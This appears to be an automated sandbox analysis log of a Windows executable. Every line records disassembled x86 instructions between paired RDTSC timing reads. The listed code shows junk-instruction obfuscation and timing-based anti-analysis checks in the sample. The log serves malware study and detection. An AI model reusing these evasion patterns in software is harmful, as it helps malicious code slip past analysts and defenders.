      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B2BF3 second address: 2B2BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B2BF9 second address: 2B2C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CACC719EBh 0x00000009 jc 00007F8CACC719E6h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B2C0E second address: 2B2C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnp 00007F8CACB12CB6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F8CACB12CC5h 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B2C43 second address: 2B2C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B2DBA second address: 2B2DE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8CACB12CC9h 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B2F31 second address: 2B2F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B2F3B second address: 2B2F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B593E second address: 2B5990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8CACC719F5h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jo 00007F8CACC719F2h 0x00000019 js 00007F8CACC719ECh 0x0000001f jng 00007F8CACC719E6h 0x00000025 mov eax, dword ptr [eax] 0x00000027 push ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F8CACC719EFh 0x0000002f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5990 second address: 1387C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ebx 0x0000000c jnc 00007F8CACB12CC0h 0x00000012 pop ebx 0x00000013 pop eax 0x00000014 and dx, F082h 0x00000019 push dword ptr [ebp+122D1115h] 0x0000001f or di, 6F8Fh 0x00000024 call dword ptr [ebp+122D1862h] 0x0000002a pushad 0x0000002b cmc 0x0000002c xor eax, eax 0x0000002e jnc 00007F8CACB12CC2h 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 jmp 00007F8CACB12CC0h 0x0000003d mov dword ptr [ebp+122D27CDh], eax 0x00000043 sub dword ptr [ebp+122D3635h], edx 0x00000049 mov esi, 0000003Ch 0x0000004e pushad 0x0000004f push edx 0x00000050 jmp 00007F8CACB12CBDh 0x00000055 pop edx 0x00000056 sub dword ptr [ebp+122D2560h], ecx 0x0000005c popad 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jo 00007F8CACB12CBCh 0x00000067 mov dword ptr [ebp+122D2560h], edi 0x0000006d lodsw 0x0000006f sub dword ptr [ebp+122D3635h], ebx 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 cld 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e mov dword ptr [ebp+122D1F22h], ecx 0x00000084 nop 0x00000085 jne 00007F8CACB12CC0h 0x0000008b push eax 0x0000008c push edx 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5A0C second address: 2B5AAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007F8CACC719E6h 0x00000010 jmp 00007F8CACC719EDh 0x00000015 popad 0x00000016 popad 0x00000017 xor dword ptr [esp], 7D426105h 0x0000001e push ebx 0x0000001f jmp 00007F8CACC719F9h 0x00000024 pop esi 0x00000025 push 00000003h 0x00000027 mov ecx, dword ptr [ebp+122D2025h] 0x0000002d adc dh, FFFFFFBAh 0x00000030 push 00000000h 0x00000032 jmp 00007F8CACC719F2h 0x00000037 push 00000003h 0x00000039 mov ecx, dword ptr [ebp+122D2B11h] 0x0000003f movzx ecx, cx 0x00000042 call 00007F8CACC719E9h 0x00000047 pushad 0x00000048 jo 00007F8CACC719ECh 0x0000004e push edx 0x0000004f jmp 00007F8CACC719EEh 0x00000054 pop edx 0x00000055 popad 0x00000056 push eax 0x00000057 ja 00007F8CACC719F0h 0x0000005d pushad 0x0000005e pushad 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5AAF second address: 2B5AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b jmp 00007F8CACB12CC4h 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F8CACB12CBFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5AE1 second address: 2B5AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jg 00007F8CACC719E6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5AF5 second address: 2B5B1B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8CACB12CC2h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F8CACB12CB8h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5B1B second address: 2B5B55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov ch, 40h 0x0000000d lea ebx, dword ptr [ebp+12450896h] 0x00000013 jno 00007F8CACC719ECh 0x00000019 sub dword ptr [ebp+122D1AA9h], ecx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F8CACC719F4h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5B55 second address: 2B5B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5B5F second address: 2B5B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5BC3 second address: 2B5BD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5BD7 second address: 2B5C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 nop 0x00000007 cmc 0x00000008 push 00000000h 0x0000000a and dx, A9D6h 0x0000000f jnl 00007F8CACC719F1h 0x00000015 push 4B24AC14h 0x0000001a jnp 00007F8CACC71A06h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8CACC719F4h 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5C18 second address: 2B5D0A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CACB12CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 4B24AC94h 0x00000011 jmp 00007F8CACB12CC2h 0x00000016 mov dword ptr [ebp+122D18BEh], edi 0x0000001c push 00000003h 0x0000001e mov dword ptr [ebp+122D26ADh], ecx 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D36DBh], ebx 0x0000002c push 00000003h 0x0000002e jmp 00007F8CACB12CC8h 0x00000033 call 00007F8CACB12CB9h 0x00000038 pushad 0x00000039 jmp 00007F8CACB12CBCh 0x0000003e push edi 0x0000003f jmp 00007F8CACB12CC9h 0x00000044 pop edi 0x00000045 popad 0x00000046 push eax 0x00000047 pushad 0x00000048 jmp 00007F8CACB12CC5h 0x0000004d jg 00007F8CACB12CBCh 0x00000053 popad 0x00000054 mov eax, dword ptr [esp+04h] 0x00000058 pushad 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c jmp 00007F8CACB12CBBh 0x00000061 popad 0x00000062 jnl 00007F8CACB12CC8h 0x00000068 popad 0x00000069 mov eax, dword ptr [eax] 0x0000006b jmp 00007F8CACB12CC1h 0x00000070 mov dword ptr [esp+04h], eax 0x00000074 push ebx 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 popad 0x00000079 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2B5D0A second address: 2B5D53 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8CACC719E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c adc ecx, 46575542h 0x00000012 lea ebx, dword ptr [ebp+1245089Fh] 0x00000018 pushad 0x00000019 push eax 0x0000001a call 00007F8CACC719EAh 0x0000001f pop ebx 0x00000020 pop eax 0x00000021 call 00007F8CACC719F4h 0x00000026 sub edx, 102312DDh 0x0000002c pop edi 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 pop edx 0x00000035 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A92B1 second address: 2A92BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2A92BB second address: 2A932E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACC719EEh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F8CACC719EFh 0x00000011 pushad 0x00000012 jmp 00007F8CACC719ECh 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F8CACC719ECh 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F8CACC719F9h 0x00000026 jmp 00007F8CACC719F0h 0x0000002b jo 00007F8CACC719EEh 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5380 second address: 2D5384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5384 second address: 2D538A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D54B1 second address: 2D54BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5626 second address: 2D562A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D562A second address: 2D5649 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CACB12CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8CACB12CC2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5903 second address: 2D5959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8CACC719E6h 0x00000009 jmp 00007F8CACC719F0h 0x0000000e jl 00007F8CACC719E6h 0x00000014 jnc 00007F8CACC719E6h 0x0000001a popad 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop edx 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pushad 0x00000024 jmp 00007F8CACC719F5h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8CACC719F0h 0x00000030 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5DB9 second address: 2D5DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007F8CACB12CBAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8CACB12CBDh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5DD9 second address: 2D5DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5DDD second address: 2D5DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5DE1 second address: 2D5E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 je 00007F8CACC71A39h 0x0000000f jnp 00007F8CACC71A10h 0x00000015 pushad 0x00000016 jmp 00007F8CACC719F7h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5FC1 second address: 2D5FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8CACB12CB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5FCD second address: 2D5FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5FD1 second address: 2D5FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5FD5 second address: 2D5FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5FE3 second address: 2D5FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D5FED second address: 2D6002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D6002 second address: 2D600F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jp 00007F8CACB12CB6h 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D6170 second address: 2D6176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D6176 second address: 2D617C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D62C3 second address: 2D62C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D62C7 second address: 2D62D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D6DCA second address: 2D6DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8CACC719E6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DA9EA second address: 2DAA08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jo 00007F8CACB12CC4h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA08 second address: 2DAA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA0C second address: 2DAA31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F8CACB12CC3h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA31 second address: 2DAA35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA35 second address: 2DAA3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DAA3B second address: 2DAA40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D98F7 second address: 2D9915 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8CACB12CBCh 0x00000008 jg 00007F8CACB12CB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8CACB12CBAh 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D9915 second address: 2D9919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2D9919 second address: 2D9922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2DCF93 second address: 2DCF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2AE3D8 second address: 2AE3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E1009 second address: 2E1020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F8CACC719F1h 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E16D0 second address: 2E16E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CBCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E16E7 second address: 2E16EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E16EB second address: 2E1705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E1862 second address: 2E1880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E1880 second address: 2E188A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E188A second address: 2E188E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E188E second address: 2E18A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F8CACB12CDDh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4EA1 second address: 2E4EC4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8CACC719E8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F8CACC719EDh 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F8CACC719E6h 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4EC4 second address: 2E4EED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F8CACB12CB6h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4EED second address: 2E4F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007F8CACC719E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4F06 second address: 2E4F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jns 00007F8CACB12CD2h 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F8CACB12CB8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b or esi, dword ptr [ebp+122D2686h] 0x00000031 push 9C2F29B3h 0x00000036 je 00007F8CACB12CC2h 0x0000003c jc 00007F8CACB12CBCh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5574 second address: 2E558C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5658 second address: 2E5662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5C49 second address: 2E5C4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5E92 second address: 2E5E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E5F84 second address: 2E5F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
